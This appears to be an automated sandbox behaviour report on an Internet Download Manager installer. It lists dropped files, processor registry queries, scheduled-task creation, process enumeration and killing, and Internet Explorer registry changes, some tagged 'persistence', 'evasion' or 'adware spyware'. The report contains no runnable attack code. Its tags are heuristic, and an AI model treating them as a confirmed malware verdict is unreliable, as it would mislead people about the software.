File created C:\Program Files (x86)\Internet Download Manager\grabber.chm C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_tr.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmvs.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_jp.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_jp.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\tutor.chm C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmwfp.inf C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_iw.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_sw.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_my.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\license.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_it.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_large_3.bmp C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_sk.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_vn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_pt.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmmzcc7_64.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_jp.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\libcrypto.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Brotli-license.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmcchandler2_64.dll C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_fa.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_kr.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_pt.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_mn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmantypeinfo.tlb C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_pl.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_de.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmindex.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_chn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_pl.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmmzcc7.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\tips.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\wuapp.exe N/A
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\system32\RUNDLL32.EXE N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SysWOW64\reg.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\reg.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\System32\tasklist.exe N/A
N/A N/A C:\Windows\System32\tasklist.exe N/A
N/A N/A C:\Windows\System32\tasklist.exe N/A
N/A N/A C:\Windows\System32\tasklist.exe N/A
N/A N/A C:\Windows\System32\tasklist.exe N/A
N/A N/A C:\Windows\System32\tasklist.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\taskkill.exe N/A
N/A N/A C:\Windows\System32\taskkill.exe N/A
N/A N/A C:\Windows\System32\taskkill.exe N/A
N/A N/A C:\Windows\System32\taskkill.exe N/A

Modifies Internet Explorer Phishing Filter

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PhishingFilter C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 10946889138eda01 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Internet Download Manager\idmBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a70000000000200000000001066000000010000200000007588267c0b2cc30cee12a283816a142a32661901a81b2523edba2ea16b0eb654000000000e80000000020000200000009a94ba15c988a7b13902fc800be6a71c1dd9940bf8864230e1a222080d5b11ad900000008f108fa6830a6b3a6a70242e5c0c37bc0cf09b3f6fda9130c7f0c21864b79b7f321f24f5ce56add0ae4560d2175aaa81e4dcda56cf6356831bd01747d2f86abffd5dd1e87d859cd32d976f5d667a7660f6afa410a9e204c76722a6dade4670202cb9c2d521aa4410212cc27dec859f58a8ec55514924ac96ad112cdcef4cab80981f4e67f3505e3ce4b382dbf467ae1740000000c9c3922389b66ca844f458538a766fcf8c5f555a0c1ba6f60433185b18c44bfb7feb949b523f869f2c739d6edcbe284ebf126e3dead4585615f2b4207343bcf4 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\ C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B851AF-A4B9-43EF-97D3-28E1B4A5DB9B}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\idmBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppName = "IDMan.exe" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\DownloadUI = "{7D11E719-FF90-479C-B0D7-96EB43EE55D7}" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Download with IDM C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Download with IDM C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\DragDrop C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppName = "IDMan.exe" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B851AF-A4B9-43EF-97D3-28E1B4A5DB9B} C:\Program Files (x86)\Internet Download Manager\idmBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DownloadUI = "{7D11E719-FF90-479C-B0D7-96EB43EE55D7}" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4} C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
